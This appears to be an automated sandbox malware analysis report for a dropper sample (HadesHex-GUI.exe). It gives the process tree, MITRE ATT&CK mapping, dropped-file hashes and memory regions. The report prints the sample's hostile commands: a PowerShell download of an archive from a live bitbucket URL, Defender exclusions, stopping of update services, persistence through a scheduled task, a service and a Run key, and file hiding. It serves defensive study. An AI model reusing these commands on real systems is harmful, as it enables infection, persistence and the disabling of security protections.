        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\825F.tmp\8260.tmp\8261.bat C:\Users\Admin\AppData\Roaming\abgzgntm.ivj0.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4712
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:700
        
        C:\Windows\system32\chcp.com
        
        chcp 1251
        7⤵
        
        PID:2596
        
        C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:784
        
        C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:1816
        
        C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:1336
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /query /tn "MyBatchScript"
        7⤵
        
        PID:5000
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
        7⤵
        Creates scheduled task(s)
        
        PID:3448
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:5008
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
        8⤵
        
        PID:4600
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3568
        
        C:\Windows\system32\reg.exe
        
        reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
        8⤵
        
        PID:3640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/e946dd91d069dd0a14070ddbc4920354650bd041/lem.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3760
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4528
        
        C:\Windows\system32\find.exe
        
        find /i "tf_win64.exe"
        7⤵
        
        PID:3428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im tf_win64.exe
        7⤵
        Kills process with taskkill
        
        PID:2288
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:1928
        
        C:\Windows\system32\find.exe
        
        find /i "dota2.exe"
        7⤵
        
        PID:2964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im dota2.exe
        7⤵
        Kills process with taskkill
        
        PID:4128
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:2816
        
        C:\Windows\system32\find.exe
        
        find /i "cs2.exe"
        7⤵
        
        PID:2540
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im cs2.exe
        7⤵
        Kills process with taskkill
        
        PID:3888
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4952
        
        C:\Windows\system32\find.exe
        
        find /i "RustClient.exe"
        7⤵
        
        PID:2872
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im RustClient.exe
        7⤵
        Kills process with taskkill
        
        PID:4356
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:5040
        
        C:\Windows\system32\find.exe
        
        find /i "GTA5.exe"
        7⤵
        
        PID:4932
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im GTA5.exe
        7⤵
        Kills process with taskkill
        
        PID:1064
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4476
        
        C:\Windows\system32\find.exe
        
        find /i "TslGame.exe"
        7⤵
        
        PID:4920
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im TslGame.exe
        7⤵
        Kills process with taskkill
        
        PID:4584
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:4284
        
        C:\Windows\system32\find.exe
        
        find /i "RainbowSix.exe"
        7⤵
        
        PID:4628
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im RainbowSix.exe
        7⤵
        Kills process with taskkill
        
        PID:3004
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 3
        7⤵
        
        PID:5016
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        
        PID:2988
        
        C:\Windows\system32\find.exe
        
        find /i "steam.exe"
        7⤵
        
        PID:596
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im steam.exe
        7⤵
        Kills process with taskkill
        
        PID:4596
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 3
        7⤵
        
        PID:1252
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4280
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:3444
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1032
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:3320
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2852
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4772
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2380
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2920
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:792
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:784
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4672
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4612
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:316
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:880
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:224
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2592
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3108
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3400
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2556
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4708
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1812
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1472
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:68
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1172
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2100
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2308
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4604
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2536
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:3088
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1616
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4436
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4956
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1252
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4952
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4272
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4932
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2564
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2632
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4636
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2612
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:68
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1540
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4584
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1872
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4604
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4672
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:824
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4064
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:5076
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:3864
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2908
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4912
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:828
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2556
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3840
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2564
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2776
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1008
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:5072
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4920
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2148
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:364
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2964
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4664
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4140
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4388
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2004
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4168
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1108
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3836
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2840
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2708
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:5036
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1252
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:4524
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4912
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:64
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1288
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3044
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1640
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3428
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4528
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4904
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1516
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:2352
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3136
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:3456
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1872
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:1112
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4292
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2988
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:4600
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:196
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:224
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        7⤵
        
        PID:1416
    - - C:\Users\Admin\AppData\Roaming\abgzgntm.ivj1.exe
        
        "C:\Users\Admin\AppData\Roaming\abgzgntm.ivj1.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3320
    - - C:\Users\Admin\AppData\Roaming\abgzgntm.ivj2.exe
        
        "C:\Users\Admin\AppData\Roaming\abgzgntm.ivj2.exe"
        5⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4588
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1796
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1160
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:1928
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:3452
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:3712
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:652
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:4396
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        
        PID:1612
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        
        PID:2816
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        
        PID:1172
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        
        PID:2380
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4548
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "AAWUFTXN"
        6⤵
        Launches sc.exe
        
        PID:2480
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:1816
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:5000
    - - C:\Users\Admin\AppData\Roaming\abgzgntm.ivj3.exe
        
        "C:\Users\Admin\AppData\Roaming\abgzgntm.ivj3.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3764
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\abgzgntm.ivj3.exe
        6⤵
        Views/modifies file attributes
        
        PID:4220
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        6⤵
        Views/modifies file attributes
        
        PID:4968
      - C:\Windows\System32\Wbem\wmic.exe
        
        wmic csproduct get UUID
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4740

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3912

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4212

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2660

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4176

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4136

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4252

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:4080

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4696

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
1⤵
PID:1408

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
1⤵
PID:4976

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
91897de07fcb115c5f42cf4c7a984982

SHA1
4903ea814fed6c31b62b394cc9eb024d107b1834

SHA256
bb34e4a3e0dd9623e77f569dbd0093b19dd43e91bb911dc7758e09fb4a53f789

SHA512
54fbd604758c7bc66151018d18bdb140d26e8dcc5d03e974197b0f3b63946eb338bf323f80b4a3e02fd109337cc1c7c8389eb15b17e0d55fced35a0398efcf4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bc625f01533cb4302b905ebbb055675b

SHA1
68d7cda1f31d891a259499032a142153dbdd9d94

SHA256
690b78d40706d849a33bb0065efee9670c8b70bc09925fa1351437163dded549

SHA512
71240681f294fc39a8b15ee77fe266dd191f0e9a5e21ee9dfbd5ee0d11e1e39bc3b94108c705b4c7d0211a802bd5d4535c24ce3a8b6ecbf583b6957b36dd8990

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dde4ef35350477192c43caa053450930

SHA1
e7621e6f9bd18113b0f88f522b5c1f202e54bb05

SHA256
e15b0c537684348c105f8f1712f6f8f51c95af6e34502b6fd7a92e3394b2307c

SHA512
7850bcca3c988c766e00c54adc804d3b14df41d55918986a9a8a91994552007778223b73c357941e145b454f840054abb8495c26047da146f49374ed3b77f747

Download Submit
C:\Users\Admin\AppData\Local\Temp\825F.tmp\8260.tmp\8261.bat

Filesize
5KB

MD5
022f1f2e0083954f32f822f0dcc6ee0d

SHA1
cf2a0d686fcf2f48945df19005d1f3beb5f415c6

SHA256
bfda7e598935d6814476e0219a356b705341b7882075d20fd506117c013b201c

SHA512
d825bb12b0cf8c18799cf32128f8983727a16840de7354140d4bcbed19619d17908d1d16060ee8449798ccc66c8379dfe8ef61ce0e0607c303c8caf6fdb96c57

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xuiw5n5m.k40.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Filesize
9.5MB

MD5
913ccfc4ae5b670abed1b489a2eb1019

SHA1
2e3b99478bf8f4439984f8800469a5e5af72ebf3

SHA256
ccbbc53f9198d63ed8baba55f837357b4e4e37eca12c222a7813ad455e09cff6

SHA512
909d6d0039aa2e195af9f3c769c837cfaac87d3d45478a94de101ebd08b9a8556906996401aea2d904c1002f25365ef37703a0e579b804c41d3de11385036ced

Download Submit
C:\Users\Admin\AppData\Roaming\abgzgntm.ivj0.exe

Filesize
92KB

MD5
b23b19cddba1a89815fe4f0409d92c89

SHA1
fffd47156c8072995a94d981fb4d5250bdc22db4

SHA256
96a733f74dd92c7787c1b422508ce76fdda7a1b58af0a5c865c72512b24c108d

SHA512
4e2f458f141d704afa27b8c180c7396064ca07b85d414358e7da0e0af9b085629fdc38132d8ab2403ec647ee7bb01b1b72c58de15860b021e732e200bbf17403

Download Submit
C:\Users\Admin\AppData\Roaming\abgzgntm.ivj1.exe

Filesize
355KB

MD5
c93d65bc0ed7ee88d266b4be759301f8

SHA1
8c0c415ba824737c61904676e7132094f5710099

SHA256
f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f

SHA512
7a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1

Download Submit
C:\Users\Admin\AppData\Roaming\abgzgntm.ivj2.exe

Filesize
5.2MB

MD5
f55fc8c32bee8f7b2253298f0a0012ba

SHA1
574c7a8f3eb378c03f58bc96252769296b20970e

SHA256
cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9

SHA512
c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a

Download Submit
C:\Users\Admin\AppData\Roaming\explorer.exe

Filesize
7KB

MD5
b5e479d3926b22b59926050c29c4e761

SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24

SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b

SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8

Download Submit
C:\Users\Admin\HadesHex-GUI.exe

Filesize
144KB

MD5
a3a73bb0b21c4c4c0771d4fda37ad34a

SHA1
a61e96bcd872da24a548b9d2bd706af102426cea

SHA256
9c04ca4639650f2707e817c8852bf8e128ab328fa4ef790aba96f8ec17ad5316

SHA512
b4bd8522d784ed13e8aaf25ab10c3b7a08bc665d79fe1365339381cd783d4df010bf5e0cc934ef6a93592d471bf2e9b67015a680f2454cb1e6a37f889dfdea68

Download Submit
memory/560-448-0x00007FFC82060000-0x00007FFC82070000-memory.dmp

Filesize
64KB

Download
memory/560-447-0x000001ED9F280000-0x000001ED9F2AB000-memory.dmp

Filesize
172KB

Download
memory/560-445-0x000001ED9EDB0000-0x000001ED9EDD4000-memory.dmp

Filesize
144KB

Download
memory/640-451-0x00007FFC82060000-0x00007FFC82070000-memory.dmp

Filesize
64KB

Download
memory/640-450-0x000002A0880D0000-0x000002A0880FB000-memory.dmp

Filesize
172KB

Download
memory/1012-458-0x00007FFC82060000-0x00007FFC82070000-memory.dmp

Filesize
64KB

Download
memory/1012-457-0x000001F741570000-0x000001F74159B000-memory.dmp

Filesize
172KB

Download
memory/1872-62-0x0000000006C10000-0x0000000006C2C000-memory.dmp

Filesize
112KB

Download
memory/1872-36-0x0000000006AE0000-0x0000000006B02000-memory.dmp

Filesize
136KB

Download
memory/1872-296-0x0000000008F10000-0x0000000008F18000-memory.dmp

Filesize
32KB

Download
memory/1872-291-0x0000000008F20000-0x0000000008F3A000-memory.dmp

Filesize
104KB

Download
memory/1872-89-0x0000000008C50000-0x0000000008C83000-memory.dmp

Filesize
204KB

Download
